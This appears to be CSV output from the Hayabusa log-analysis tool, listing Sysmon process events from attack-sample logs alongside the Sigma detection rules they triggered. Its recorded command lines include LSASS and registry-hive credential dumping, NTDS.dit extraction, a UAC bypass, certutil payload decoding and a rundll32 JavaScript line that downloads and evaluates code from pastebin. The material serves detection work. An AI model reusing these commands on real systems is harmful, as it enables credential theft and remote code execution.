+2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user  :  Path: C:\Windows\System32\whoami.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\sam sam  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\system system  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\security security  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe  create shadow /for=C:  :  Path: C:\Windows\System32\vssadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm  :  Path: C:\Windows\hh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe""   :  Path: C:\Users\IEUser\Downloads\UACBypass.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders  :  Command: ""C:\Windows \System32\winSAT.exe"" formal  :  Path: C:\Windows \System32\winSAT.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders  :  Command: ""C:\Windows \System32\winSAT.exe"" formal  :  Path: C:\Windows \System32\winSAT.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\System32\control.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt  :  Path: C:\Windows\SysWOW64\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c certutil -f -decode fi.b64 AllTheThings.dll   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil  -f -decode fi.b64 AllTheThings.dll   :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
